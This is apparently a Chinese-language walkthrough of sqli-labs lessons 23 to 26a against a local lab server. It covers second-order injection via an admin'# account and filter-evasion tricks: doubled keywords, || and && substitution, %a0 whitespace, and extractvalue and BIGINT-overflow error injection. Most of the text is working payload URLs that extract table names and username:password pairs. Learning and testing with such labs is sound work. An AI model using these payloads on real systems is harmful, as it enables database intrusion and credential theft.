存储型注入
注册admin’#的账号,密码为123456
修改admin’#的密码为hahaha
修改结果如下
发现admin的密码被更改为hahaha
绕过注释符注入
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
获取id参数时进行了#,- -注释符号的过滤
获取数据库
http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select database()),'3
获取security数据库中的表
http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),'3
获取users表的列
http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),'3
获取内容
http://127.0.0.1/sqlilab/Less-23/index.php?id=-1' union select 1,(select group_concat(username,0x3a,password) from users),'3
绕过or和and
大小写变形 Or,OR,oR
编码,hex,urlencode
添加注释/* or */
利用符号 and=&& or=||
双写or或and绕过
通过报错注入
获取当前数据库
http://127.0.0.1/sqlilab/Less-25/?id=1' || extractvalue(1,concat(0x7e,(select database()),0x7e)) --+
获取security数据库下的表名
http://127.0.0.1/sqlilab/Less-25/index.php?id=1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),0x7e))--+
这里将information_schema改为infoorrmation_schema来绕过or过滤
获取emails表列名
http://127.0.0.1/sqlilab/Less-25/index.php?id=1' || extractvalue(1,concat(0x7e,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='emails'),0x7e))--+
这里使用aandnd来绕过and过滤。
获取emails表内容
http://127.0.0.1/sqlilab/Less-25/index.php?id=1' || extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,email_id) from emails),0x7e))--+
通过union注入
获取当前数据库
http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select database()),2
获取当前数据库的数据表
http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'),2
获取refers表的列名
http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='referers'),2
获取refers表的内容
http://127.0.0.1/sqlilab/Less-25a/index.php?id=-1 union select 1,(select group_concat(id,0x3e,referer,0x3e,ip_address) from referers),2
绕过多种符号的过滤
%09 TAB键(水平)
%0a 新建一行
%0c 新的一页
%0d return功能
%0b TAB键(垂直)
%a0 空格
通过BIGINT溢出报错注入
获取当前数据库
http://127.0.0.1/sqlilab/Less-26/?id=1' union select (!(select * from (select database())x) - ~0),2,3 || '1
将空格用%a0代替后
http://127.0.0.1/sqlilab/Less-26/?id=1'%a0union%a0select%a0(!(select%a0*%a0from%a0(select%a0database())x)%a0-%a0~0),2,3%a0||%a0'1
其它过程类似
通过union注入
获取当前数据库
http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,database(),('3
http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,database(),('3
获取当前数据库下数据表
http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),('3
http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'),('3
获取users表的列名
http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),('3
http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(column_name)%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0aandnd%a0table_name='users'),('3
获取users表内容
http://127.0.0.1/sqlilab/Less-26a/?id=100')union select 1,(select group_concat(username,0x3a,password) from users),('3
http://127.0.0.1/sqlilab/Less-26a/?id=100')union%a0select%a01,(select%a0group_concat(username,0x3a,passwoorrd)%a0from%a0security.users),('3